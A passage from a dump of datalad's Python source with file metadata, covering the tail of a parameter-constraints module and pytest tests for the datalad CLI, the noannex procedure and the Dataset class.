documentation on an appropriate parameter value.\n \"\"\"\n\n # TODO: __str__ and/or __repr__ for every one of them\n\n def __repr__(self):\n \"\"\"Rudimentary repr to avoid default scary to the user Python repr\"\"\"\n return \"constraint:%s\" % self.short_description()\n\n def __and__(self, other):\n return Constraints(self, other)\n\n def __or__(self, other):\n return AltConstraints(self, other)\n\n def __call__(self, value):\n # do any necessary checks or conversions, potentially catch exceptions\n # and generate a meaningful error message\n raise NotImplementedError(\"abstract class\")\n\n def long_description(self):\n # return meaningful docs or None\n # used as a comprehensive description in the parameter list\n return self.short_description()\n\n def short_description(self):\n # return meaningful docs or None\n # used as a condensed primer for the parameter lists\n raise NotImplementedError(\"abstract class\")\n\n\nclass EnsureDType(Constraint):\n \"\"\"Ensure that an input (or several inputs) are of 
a particular data type.\n \"\"\"\n # TODO extend to support numpy-like dtype specs, e.g. 'int64'\n # in addition to functors\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n\n def __call__(self, value):\n if hasattr(value, '__iter__') and \\\n not (isinstance(value, (bytes, str))):\n return list(map(self._dtype, value))\n else:\n return self._dtype(value)\n\n def short_description(self):\n return _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to type '%s'\" % self.short_description()\n\n\nclass EnsureInt(EnsureDType):\n \"\"\"Ensure that an input (or several inputs) are of a data type 'int'.\n \"\"\"\n def __init__(self):\n \"\"\"Initializes EnsureDType with int\"\"\"\n EnsureDType.__init__(self, int)\n\n\nclass EnsureFloat(EnsureDType):\n \"\"\"Ensure that an input (or several inputs) are of a data type 'float'.\n \"\"\"\n def __init__(self):\n \"\"\"Initializes EnsureDType with float\"\"\"\n EnsureDType.__init__(self, float)\n\n\nclass EnsureListOf(Constraint):\n \"\"\"Ensure that an input is a list of a particular data type\n \"\"\"\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n super(EnsureListOf, self).__init__()\n\n def __call__(self, value):\n return list(map(self._dtype, ([value] if isinstance(value, str) else value)))\n\n def short_description(self):\n return 'list(%s)' % _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to %s\" % self.short_description()\n\n\nclass EnsureTupleOf(Constraint):\n \"\"\"Ensure that an input is a tuple of a particular data type\n \"\"\"\n def __init__(self, dtype):\n \"\"\"\n Parameters\n ----------\n dtype : functor\n \"\"\"\n self._dtype = dtype\n super(EnsureTupleOf, self).__init__()\n\n def __call__(self, value):\n return tuple(map(self._dtype, ([value] if isinstance(value, str) else value)))\n\n def short_description(self):\n return 'tuple(%s)' % _type_str(self._dtype)\n\n def long_description(self):\n return \"value must be convertible to %s\" % self.short_description()\n\n\nclass EnsureBool(Constraint):\n \"\"\"Ensure that an input is a bool.\n\n A couple of literal labels are supported, such as:\n False: '0', 'no', 'off', 'disable', 'false'\n True: '1', 'yes', 'on', 'enable', 'true'\n \"\"\"\n def __call__(self, value):\n if isinstance(value, bool):\n return value\n elif isinstance(value, (bytes, str)):\n value = value.lower()\n if value in ('0', 'no', 'off', 'disable', 'false'):\n return False\n elif value in ('1', 'yes', 'on', 'enable', 'true'):\n return True\n raise ValueError(\n \"value '{}' must be convertible to boolean\".format(\n value))\n\n def long_description(self):\n return 'value must be convertible to type bool'\n\n def short_description(self):\n return 'bool'\n\n\nclass EnsureStr(Constraint):\n \"\"\"Ensure an input is a string.\n\n No automatic conversion is attempted.\n \"\"\"\n def __init__(self, min_len=0):\n \"\"\"\n Parameters\n ----------\n min_len: int, optional\n Minimal length for a string.\n \"\"\"\n assert(min_len >= 0)\n self._min_len = min_len\n super(EnsureStr, self).__init__()\n\n def __call__(self, value):\n if not isinstance(value, (bytes, str)):\n # do not perform a blind conversion ala str(), as almost\n # anything can be converted and the result is most likely\n # unintended\n raise ValueError(\"%s is not a string\" % repr(value))\n if len(value) < self._min_len:\n raise ValueError(\"%r is 
shorter than of minimal length %d\"\n % (value, self._min_len))\n return value\n\n def long_description(self):\n return 'value must be a string'\n\n def short_description(self):\n return 'str'\n\n\nclass EnsureStrPrefix(EnsureStr):\n \"\"\"Ensure an input is a string that starts with a given prefix.\n \"\"\"\n def __init__(self, prefix):\n \"\"\"\n Parameters\n ----------\n prefix : str\n Mandatory prefix.\n \"\"\"\n self._prefix = prefix\n super().__init__()\n\n def __call__(self, value):\n super().__call__(value)\n if not value.startswith(self._prefix):\n raise ValueError(\"%r does not start with '%s'\"\n % (value, self._prefix))\n return value\n\n def long_description(self):\n return \"value must start with '{}'\".format(self._prefix)\n\n def short_description(self):\n return '{}...'.format(self._prefix)\n\n\nclass EnsureNone(Constraint):\n \"\"\"Ensure an input is of value `None`\"\"\"\n def __call__(self, value):\n if value is None or isinstance(value, _NoneDeprecated):\n return None\n else:\n raise ValueError(\"value must be `None`\")\n\n def short_description(self):\n return 'None'\n\n def long_description(self):\n return 'value must be `None`'\n\n\nclass EnsureCallable(Constraint):\n \"\"\"Ensure an input is a callable object\"\"\"\n def __call__(self, value):\n if hasattr(value, '__call__'):\n return value\n else:\n raise ValueError(\"value must be a callable\")\n\n def short_description(self):\n return 'callable'\n\n def long_description(self):\n return 'value must be a callable'\n\n\nclass EnsureChoice(Constraint):\n \"\"\"Ensure an input is element of a set of possible values\"\"\"\n\n def __init__(self, *values):\n \"\"\"\n Parameters\n ----------\n *values\n Possible accepted values.\n \"\"\"\n self._allowed = values\n super(EnsureChoice, self).__init__()\n\n def __call__(self, value):\n if value not in self._allowed:\n raise ValueError(f\"value {value} is not one of {self._allowed}\")\n return value\n\n def long_description(self):\n return 'value must be one of [CMD: %s CMD][PY: %s PY]' % (\n str(tuple(i for i in self._allowed if i is not None)),\n str(self._allowed)\n )\n\n def short_description(self):\n return '{%s}' % ', '.join([repr(c) for c in self._allowed])\n\n\nclass EnsureKeyChoice(EnsureChoice):\n \"\"\"Ensure value under a key in an input is in a set of possible values\"\"\"\n\n def __init__(self, key, values):\n \"\"\"\n Parameters\n ----------\n key : str\n The to-be-tested values are looked up under the given key in\n a dict-like input object.\n values : tuple\n Possible accepted values.\n \"\"\"\n self._key = key\n super(EnsureKeyChoice, self).__init__(*values)\n\n def __call__(self, value):\n if self._key not in value:\n raise ValueError(\"value not dict-like\")\n super(EnsureKeyChoice, self).__call__(value[self._key])\n return value\n\n def long_description(self):\n return \"value in '%s' must be one of %s\" % (self._key, str(self._allowed),)\n\n def short_description(self):\n return '%s:{%s}' % (self._key, ', '.join([str(c) for c in self._allowed]))\n\n\nclass EnsureRange(Constraint):\n \"\"\"Ensure an input is within a particular range\n\n No type checks are performed.\n \"\"\"\n def __init__(self, min=None, max=None):\n \"\"\"\n Parameters\n ----------\n min\n Minimal value to be accepted in the range\n max\n Maximal value to be accepted in the range\n \"\"\"\n self._min = min\n self._max = max\n super(EnsureRange, self).__init__()\n\n def __call__(self, value):\n if self._min is not None:\n if value < self._min:\n raise ValueError(\"value must be at 
least %s\" % (self._min,))\n if self._max is not None:\n if value > self._max:\n raise ValueError(\"value must be at most %s\" % (self._max,))\n return value\n\n def long_description(self):\n min_str = '-inf' if self._min is None else str(self._min)\n max_str = 'inf' if self._max is None else str(self._max)\n return 'value must be in range [%s, %s]' % (min_str, max_str)\n\n def short_description(self):\n return None\n\n\nclass _MultiConstraint(Constraint):\n \"\"\"Helper class to override the description methods to reported\n multiple constraints\n \"\"\"\n def _get_description(self, attr):\n cs = [\n getattr(c, attr)()\n for c in self.constraints\n if hasattr(c, attr)\n ]\n cs = [c for c in cs if c is not None]\n doc = ' or '.join(cs)\n if len(cs) > 1:\n return f'({doc})'\n else:\n return doc\n\n def long_description(self):\n return self._get_description('long_description')\n\n def short_description(self):\n return self._get_description('short_description')\n\n\nclass AltConstraints(_MultiConstraint):\n \"\"\"Logical OR for constraints.\n\n An arbitrary number of constraints can be given. They are evaluated in the\n order in which they were specified. The value returned by the first\n constraint that does not raise an exception is the global return value.\n\n Documentation is aggregated for all alternative constraints.\n \"\"\"\n def __init__(self, *constraints):\n \"\"\"\n Parameters\n ----------\n *constraints\n Alternative constraints\n \"\"\"\n super(AltConstraints, self).__init__()\n self.constraints = [EnsureNone() if c is None else c for c in constraints]\n\n def __or__(self, other):\n if isinstance(other, AltConstraints):\n self.constraints.extend(other.constraints)\n else:\n self.constraints.append(other)\n return self\n\n def __call__(self, value):\n e_list = []\n for c in self.constraints:\n try:\n return c(value)\n except Exception as e:\n e_list.append(e)\n raise ValueError(f\"{value} does not match any alternative: \"\n f\"{self.constraints} {e_list}\")\n\n\nclass Constraints(_MultiConstraint):\n \"\"\"Logical AND for constraints.\n\n An arbitrary number of constraints can be given. They are evaluated in the\n order in which they were specified. The return value of each constraint is\n passed an input into the next. The return value of the last constraint\n is the global return value. No intermediate exceptions are caught.\n\n Documentation is aggregated for all constraints.\n \"\"\"\n def __init__(self, *constraints):\n \"\"\"\n Parameters\n ----------\n *constraints\n Constraints all of which must be satisfied\n \"\"\"\n super(Constraints, self).__init__()\n self.constraints = [EnsureNone() if c is None else c for c in constraints]\n\n def __and__(self, other):\n if isinstance(other, Constraints):\n self.constraints.extend(other.constraints)\n else:\n self.constraints.append(other)\n return self\n\n def __call__(self, value):\n for c in (self.constraints):\n value = c(value)\n return value\n\n\nconstraint_spec_map = {\n 'float': EnsureFloat(),\n 'int': EnsureInt(),\n 'bool': EnsureBool(),\n 'str': EnsureStr(),\n}\n\n\ndef expand_constraint_spec(spec):\n \"\"\"Helper to translate literal constraint specs into functional ones\n\n e.g. 
'float' -> EnsureFloat()\n \"\"\"\n if spec is None or hasattr(spec, '__call__'):\n return spec\n else:\n try:\n return constraint_spec_map[spec]\n except KeyError:\n raise ValueError(\"unsupported constraint specification '%r'\" % (spec,))\n" }, { "alpha_fraction": 0.5809230804443359, "alphanum_fraction": 0.5839999914169312, "avg_line_length": 33.574466705322266, "blob_id": "207019f1d984c3b20db91066bde41303ae8d6fc0", "content_id": "09f14b371c7bdd9517ea49b65ea270f5278f3446", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1625, "license_type": "permissive", "max_line_length": 93, "num_lines": 47, "path": "/datalad/tests/test_installed.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test invocation of datalad utilities \"as is installed\"\n\"\"\"\n\nimport os\nfrom unittest.mock import patch\n\nfrom datalad.cmd import (\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import CommandError\nfrom datalad.tests.utils_pytest import (\n assert_cwd_unchanged,\n eq_,\n ok_startswith,\n)\n\n\ndef check_run_and_get_output(cmd):\n runner = WitlessRunner()\n try:\n # suppress log output happen it was set to high values\n with patch.dict('os.environ', {'DATALAD_LOG_LEVEL': 'WARN'}):\n output = runner.run(\n [\"datalad\", \"--help\"],\n protocol=StdOutErrCapture)\n except CommandError as e:\n raise AssertionError(\"'datalad --help' failed to start normally. 
\"\n \"Exited with %d and output %s\" % (e.code, (e.stdout, e.stderr)))\n return output['stdout'], output['stderr']\n\n\n@assert_cwd_unchanged\ndef test_run_datalad_help():\n out, err = check_run_and_get_output(\"datalad --help\")\n ok_startswith(out, \"Usage: \")\n # There could be a warning from coverage that no data was collected, should be benign\n lines = [l for l in err.split(os.linesep) if ('no-data-collected' not in l) and l]\n eq_(lines, [])\n" }, { "alpha_fraction": 0.6395348906517029, "alphanum_fraction": 0.6421775817871094, "avg_line_length": 31.06779670715332, "blob_id": "e3c0782f310cde83972c5dea22686f7f392104f4", "content_id": "f9b11443038da74930d0d2ea52432feba4cf26ed", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1892, "license_type": "permissive", "max_line_length": 94, "num_lines": 59, "path": "/datalad/resources/procedures/tests/test_noannex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- \n#ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport pytest\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_raises,\n assert_true,\n with_tempfile,\n with_tree,\n)\n\n\ndef check_noannex(ds):\n assert_true(isinstance(ds.repo, GitRepo))\n assert_true((ds.pathobj / \".noannex\").exists())\n assert_false((ds.pathobj / \".git\" / \"annex\").exists())\n\n\n@with_tempfile(mkdir=True)\ndef test_noannex_simple(path=None):\n ds = Dataset(path).create()\n assert_true(isinstance(ds.repo, AnnexRepo))\n ds.run_procedure('cfg_noannex') # we are killing annex while ds.repo\n check_noannex(ds)\n\n\n@with_tree(tree={\n 'data': 'some'\n})\ndef test_noannex_create_force(path=None):\n ds = Dataset(path).create(force=True, cfg_proc='noannex')\n check_noannex(ds)\n\n\[email protected](reason=\"Under pytest gets IncompleteResultsError with CommandError inside \"\n \"instead of actual CommandError\")\n@with_tree(tree={\n 'data': 'some'\n})\ndef test_noannex_fail_if_has_annexed(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_true(isinstance(ds.repo, AnnexRepo))\n # internally procedure raises RuntimeError, but since we run it via runner, we\n # get CommandError here\n with assert_raises(CommandError):\n ds.run_procedure('cfg_noannex') # we are killing annex while ds.repo\n" }, { "alpha_fraction": 0.619040846824646, "alphanum_fraction": 0.6242853999137878, "avg_line_length": 31.967288970947266, "blob_id": "6371bc650e6e2f7fbae68522d71ed43c2633ee3e", "content_id": "63ad84cd7816e7207ba3a3882611f3afb4b550bc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21165, "license_type": "permissive", "max_line_length": 103, "num_lines": 642, "path": "/datalad/distribution/tests/test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### 
### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test Dataset class\n\n\"\"\"\n\nimport os\nimport os.path as op\nfrom os.path import abspath\nfrom os.path import join as opj\nfrom os.path import (\n lexists,\n relpath,\n)\n\nimport pytest\n\nimport datalad.utils as ut\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n clone,\n create,\n get,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n NoDatasetFound,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_equal,\n assert_false,\n assert_is,\n assert_is_instance,\n assert_is_none,\n assert_is_not,\n assert_is_not_none,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_true,\n eq_,\n known_failure_windows,\n ok_,\n swallow_logs,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n on_windows,\n rmtree,\n)\n\nfrom ..dataset import (\n Dataset,\n EnsureDataset,\n require_dataset,\n resolve_path,\n)\n\n\ndef test_EnsureDataset():\n\n c = EnsureDataset()\n\n # fails with anything else than a string or a Dataset:\n assert_raises(ValueError, c, 1)\n assert_raises(ValueError, c, ['a', 'list'])\n assert_raises(ValueError, c, (1, 2, 3))\n assert_raises(ValueError, c, {\"what\": \"ever\"})\n\n # let's a Dataset instance pass, but leaves a path untouched\n for test_path in [opj(\"some\", \"path\"), Path(\"some\") / \"path\"]:\n ok_(isinstance(c(test_path), type(test_path)))\n ok_(isinstance(Dataset(test_path), Dataset))\n\n # Note: Ensuring that string is valid path is not\n # part of the constraint itself, so not explicitly tested here.\n\n\n# TODO: test remember/recall more extensive?\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_is_installed(src=None, path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(src).create(**ca)\n _ = origds.create('subm 1', **ca)\n\n ds = Dataset(path)\n assert_false(ds.is_installed())\n\n # get a clone:\n clone(src, path, **ca)\n ok_(ds.is_installed())\n # submodule still not installed:\n subds = Dataset(ds.pathobj / 'subm 1')\n assert_false(subds.is_installed())\n # We must not be able to create a new repository under a known\n # subdataset path.\n # Note: Unfortunately we would still be able to generate it under\n # subdirectory within submodule, e.g. `subm 1/subdir` but that is\n # not checked here. 
`create` provides that protection though.\n res = subds.create(on_failure='ignore',\n return_type='list',\n result_filter=None,\n result_xfm=None,\n **ca)\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, status='error', path=subds.path,\n message=('collision with %s (dataset) in dataset %s',\n subds.path, ds.path))\n # get the submodule\n with chpwd(ds.path):\n get('subm 1', **ca)\n ok_(subds.is_installed())\n # wipe it out\n rmtree(ds.path)\n assert_false(ds.is_installed())\n\n\n@with_tempfile(mkdir=True)\ndef test_dataset_constructor(path=None):\n # dataset needs a path\n assert_raises(TypeError, Dataset)\n assert_raises(ValueError, Dataset, None)\n with chpwd(path):\n assert_raises(NoDatasetFound, Dataset, '^.')\n assert_raises(NoDatasetFound, Dataset, '^')\n dsabs = Dataset(path)\n # always abspath\n ok_(os.path.isabs(dsabs.path))\n eq_(path, dsabs.path)\n # no repo\n eq_(dsabs.repo, None)\n # same result when executed in that path and using relative paths\n with chpwd(path):\n dsrel = Dataset('.')\n eq_(dsrel.path, dsabs.path)\n # no repo either, despite directory existing now\n eq_(dsrel.repo, None)\n\n\n@with_tempfile(mkdir=True)\ndef test_repo_cache(path=None):\n ds = Dataset(path)\n # none by default\n eq_(ds.repo, None)\n # make Git repo manually\n git = GitRepo(path=path, create=True)\n repo = ds.repo\n # got one\n assert_false(repo is None)\n # stays that one\n assert_true(ds.repo is repo)\n # now turn into an annex\n annex = AnnexRepo(path=path, create=True)\n # repo instance must change\n assert_false(ds.repo is repo)\n assert_true(isinstance(ds.repo, AnnexRepo))\n\n\n@with_tempfile(mkdir=True)\ndef test_subdatasets(path=None):\n # from scratch\n ds = Dataset(path)\n assert_false(ds.is_installed())\n assert_raises(ValueError, ds.subdatasets)\n ds = ds.create()\n assert_true(ds.is_installed())\n eq_(ds.subdatasets(), [])\n # create some file and commit it\n open(os.path.join(ds.path, 'test'), 'w').write('some')\n ds.save(path='test', message=\"Hello!\", version_tag=1)\n assert_true(ds.is_installed())\n # Assuming that tmp location was not under a super-dataset\n eq_(ds.get_superdataset(), None)\n eq_(ds.get_superdataset(topmost=True), ds)\n\n # add itself as a subdataset (crazy, isn't it?)\n subds = ds.install('subds', source=path,\n result_xfm='datasets', return_type='item-or-list')\n assert_true(subds.is_installed())\n eq_(subds.get_superdataset(), ds)\n eq_(subds.get_superdataset(topmost=True), ds)\n\n subdss = ds.subdatasets()\n eq_(len(subdss), 1)\n eq_(subds.path, ds.subdatasets(result_xfm='paths')[0])\n eq_(subdss, ds.subdatasets(recursive=True))\n eq_(subdss, ds.subdatasets(state='present'))\n ds.save(message=\"with subds\", version_tag=2)\n ds.recall_state(1)\n assert_true(ds.is_installed())\n eq_(ds.subdatasets(), [])\n\n # very nested subdataset to test topmost\n subsubds = subds.install(\n _path_('d1/subds'), source=path,\n result_xfm='datasets', return_type='item-or-list')\n assert_true(subsubds.is_installed())\n eq_(subsubds.get_superdataset(), subds)\n # by default, it will only report a subperdataset that actually\n # has the queries dataset as a registered true subdataset\n eq_(subsubds.get_superdataset(topmost=True), subds)\n # by we can also ask for a dataset that is merely above\n eq_(subsubds.get_superdataset(topmost=True, registered_only=False), ds)\n\n # verify that '^' alias would work\n with chpwd(subsubds.path):\n dstop = Dataset('^')\n eq_(dstop, subds)\n # and while in the dataset we still can resolve into central one\n dscentral = 
Dataset('///')\n eq_(dscentral.path,\n dl_cfg.obtain('datalad.locations.default-dataset'))\n\n with chpwd(ds.path):\n dstop = Dataset('^')\n eq_(dstop, ds)\n\n # TODO actual submodule checkout is still there\n\n # Test ^. (the dataset for curdir) shortcut\n # At the top should point to the top\n with chpwd(ds.path):\n dstop = Dataset('^.')\n eq_(dstop, ds)\n\n # and still does within subdir\n os.mkdir(opj(ds.path, 'subdir'))\n with chpwd(opj(ds.path, 'subdir')):\n dstop = Dataset('^.')\n eq_(dstop, ds)\n\n # within submodule will point to submodule\n with chpwd(subsubds.path):\n dstop = Dataset('^.')\n eq_(dstop, subsubds)\n\n\n@with_tempfile(mkdir=True)\ndef test_hat_dataset_more(path=None):\n # from scratch\n ds = Dataset(path).create()\n # add itself as a subdataset (crazy, isn't it?)\n subds = ds.install(\n 'subds', source=path,\n result_xfm='datasets', return_type='item-or-list')\n # must find its way all the way up from an untracked dir in a subsubds\n untracked_subdir = op.join(subds.path, 'subdir')\n os.makedirs(untracked_subdir)\n with chpwd(untracked_subdir):\n eq_(Dataset('^'), ds)\n\n\[email protected](\"ds_path\", [\"simple-path\", OBSCURE_FILENAME])\n@with_tempfile(mkdir=True)\ndef test_require_dataset(topdir=None, *, ds_path):\n path = opj(topdir, ds_path)\n os.mkdir(path)\n with chpwd(path):\n assert_raises(\n NoDatasetFound,\n require_dataset,\n None)\n create('.')\n # in this folder by default\n assert_equal(\n require_dataset(None).path,\n path)\n\n assert_equal(\n require_dataset('some', check_installed=False).path,\n abspath('some'))\n assert_raises(\n NoDatasetFound,\n require_dataset,\n 'some',\n check_installed=True)\n\n\n@with_tempfile(mkdir=True)\ndef test_dataset_id(path=None):\n\n ds = Dataset(path)\n assert_equal(ds.id, None)\n ds.create()\n dsorigid = ds.id\n # ID is always a UUID\n assert_equal(ds.id.count('-'), 4)\n assert_equal(len(ds.id), 36)\n\n # Ben: The following part of the test is concerned with creating new objects\n # and therefore used to reset the flyweight dict while keeping a ref to\n # the old object for comparison etc. This is ugly and in parts\n # retesting what is already tested in `test_Dataset_flyweight`. No need\n # for that. If we del the last ref to an instance and gc.collect(),\n # then we get a new instance on next request. 
This test should trust\n # the result of `test_Dataset_flyweight`.\n\n # creating a new object for the same path\n # yields the same ID\n del ds\n newds = Dataset(path)\n assert_equal(dsorigid, newds.id)\n\n # recreating the dataset does NOT change the id\n del newds\n\n ds = Dataset(path)\n ds.create(annex=False, force=True)\n assert_equal(ds.id, dsorigid)\n\n # even adding an annex doesn't\n del ds\n ds = Dataset(path)\n ds.create(force=True)\n assert_equal(ds.id, dsorigid)\n\n # dataset ID and annex UUID have nothing to do with each other\n # if an ID was already generated\n assert_true(ds.repo.uuid != ds.id)\n\n # even if we generate a dataset from scratch with an annex UUID right away,\n # this is also not the ID\n annexds = Dataset(opj(path, 'scratch')).create()\n assert_true(annexds.id != annexds.repo.uuid)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_Dataset_flyweight(path1=None, path2=None):\n\n import gc\n import sys\n\n ds1 = Dataset(path1)\n assert_is_instance(ds1, Dataset)\n # Don't create circular references or anything similar\n assert_equal(1, sys.getrefcount(ds1) - 1)\n\n ds1.create()\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # refcount still fine after repo creation:\n assert_equal(1, sys.getrefcount(ds1) - 1)\n\n\n # instantiate again:\n ds2 = Dataset(path1)\n assert_is_instance(ds2, Dataset)\n # the very same object:\n ok_(ds1 is ds2)\n\n # reference the same via relative path:\n with chpwd(path1):\n ds3 = Dataset(relpath(path1, start=path2))\n ok_(ds1 == ds3)\n ok_(ds1 is ds3)\n\n # gc knows one such object only:\n eq_(1, len([o for o in gc.get_objects()\n if isinstance(o, Dataset) and o.path == path1]))\n\n\n # on windows a symlink is not what you think it is\n if not on_windows:\n # reference the same via symlink:\n with chpwd(path2):\n os.symlink(path1, 'linked')\n ds4 = Dataset('linked')\n ds4_id = id(ds4)\n ok_(ds4 == ds1)\n ok_(ds4 is not ds1)\n\n # underlying repo, however, IS the same:\n ok_(ds4.repo is ds1.repo)\n\n # deleting one reference has no effect on the other:\n del ds1\n gc.collect() # TODO: see first comment above\n ok_(ds2 is not None)\n ok_(ds2.repo is ds3.repo)\n if not on_windows:\n ok_(ds2.repo is ds4.repo)\n\n # deleting remaining references should lead to garbage collection\n del ds2\n\n with swallow_logs(new_level=1) as cml:\n del ds3\n gc.collect() # TODO: see first comment above\n # flyweight vanished:\n assert_not_in(path1, Dataset._unique_instances.keys())\n # no such instance known to gc anymore:\n eq_([], [o for o in gc.get_objects()\n if isinstance(o, Dataset) and o.path == path1])\n # underlying repo should only be cleaned up, if ds3 was the last\n # reference to it. 
Otherwise the repo instance should live on\n # (via symlinked ds4):\n finalizer_log = \"Finalizer called on: AnnexRepo(%s)\" % path1\n if on_windows:\n cml.assert_logged(msg=finalizer_log,\n level=\"Level 1\",\n regex=False)\n else:\n assert_not_in(finalizer_log, cml.out)\n # symlinked is still there:\n ok_(ds4 is not None)\n eq_(ds4_id, id(ds4))\n\n\n@with_tempfile\ndef test_property_reevaluation(repo1=None):\n ds = Dataset(repo1)\n assert_is_none(ds.repo)\n assert_is_not_none(ds.config)\n first_config = ds.config\n assert_false(ds._cfg_bound)\n assert_is_none(ds.id)\n\n ds.create()\n assert_repo_status(repo1)\n # after creation, we have `repo`, and `config` was reevaluated to point\n # to the repo's config:\n assert_is_not_none(ds.repo)\n assert_is_not_none(ds.config)\n second_config = ds.config\n assert_true(ds._cfg_bound)\n assert_is(ds.config, ds.repo.config)\n assert_is_not(first_config, second_config)\n assert_is_not_none(ds.id)\n first_id = ds.id\n\n ds.drop(what='all', reckless='kill', recursive=True)\n # repo is gone, and config is again reevaluated to only provide user/system\n # level config:\n assert_false(lexists(ds.path))\n assert_is_none(ds.repo)\n assert_is_not_none(ds.config)\n third_config = ds.config\n assert_false(ds._cfg_bound)\n assert_is_not(second_config, third_config)\n assert_is_none(ds.id)\n\n ds.create()\n assert_repo_status(repo1)\n # after recreation everything is sane again:\n assert_is_not_none(ds.repo)\n assert_is_not_none(ds.config)\n assert_is(ds.config, ds.repo.config)\n forth_config = ds.config\n assert_true(ds._cfg_bound)\n assert_is_not(third_config, forth_config)\n assert_is_not_none(ds.id)\n assert_not_equal(ds.id, first_id)\n\n\n# While os.symlink does work on windows (since vista), os.path.realpath\n# doesn't resolve such symlinks. 
This has all kinds of implications.\n# Hopefully this can be dealt with, when we switch to using pathlib\n# (see datalad-revolution).\n@known_failure_windows\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_symlinked_dataset_properties(repo1=None, repo2=None, repo3=None, non_repo=None, symlink=None):\n\n ds = Dataset(repo1).create()\n\n # now, let ds be a symlink and change that symlink to point to different\n # things:\n ar2 = AnnexRepo(repo2)\n ar3 = AnnexRepo(repo3)\n assert_true(os.path.isabs(non_repo))\n\n os.symlink(repo1, symlink)\n ds_link = Dataset(symlink)\n assert_is(ds_link.repo, ds.repo) # same Repo instance\n assert_is_not(ds_link, ds) # but not the same Dataset instance\n assert_is(ds_link.config, ds.repo.config)\n assert_true(ds_link._cfg_bound)\n assert_is_not_none(ds_link.id)\n # same id, although different Dataset instance:\n assert_equal(ds_link.id, ds.id)\n\n os.unlink(symlink)\n os.symlink(repo2, symlink)\n\n assert_is(ds_link.repo, ar2) # same Repo instance\n assert_is(ds_link.config, ar2.config)\n assert_true(ds_link._cfg_bound)\n # id is None again, since this repository is an annex but there was no\n # Dataset.create() called yet.\n assert_is_none(ds_link.id)\n\n os.unlink(symlink)\n os.symlink(repo3, symlink)\n\n assert_is(ds_link.repo, ar3) # same Repo instance\n assert_is(ds_link.config, ar3.config)\n assert_true(ds_link._cfg_bound)\n # id is None again, since this repository is an annex but there was no\n # Dataset.create() called yet.\n assert_is_none(ds_link.id)\n\n os.unlink(symlink)\n os.symlink(non_repo, symlink)\n\n assert_is_none(ds_link.repo)\n assert_is_not(ds_link.config, ar3.config)\n assert_false(ds_link._cfg_bound)\n assert_is_none(ds_link.id)\n\n\n@with_tempfile(mkdir=True)\ndef test_resolve_path(path=None):\n if str(Path(path).resolve()) != path:\n raise SkipTest(\"Test assumptions require non-symlinked parent paths\")\n # initially ran into on OSX https://github.com/datalad/datalad/issues/2406\n opath = op.join(path, \"origin\")\n os.makedirs(opath)\n if not on_windows:\n lpath = op.join(path, \"linked\")\n os.symlink('origin', lpath)\n\n ds_global = Dataset(path)\n # path resolution of absolute paths is not influenced by symlinks\n # ignore the linked path on windows, it is not a symlink in the POSIX sense\n for d in (opath,) if on_windows else (opath, lpath):\n ds_local = Dataset(d)\n # no symlink resolution\n eq_(str(resolve_path(d)), d)\n # list comes out as a list\n eq_(resolve_path([d]), [Path(d)])\n # multiple 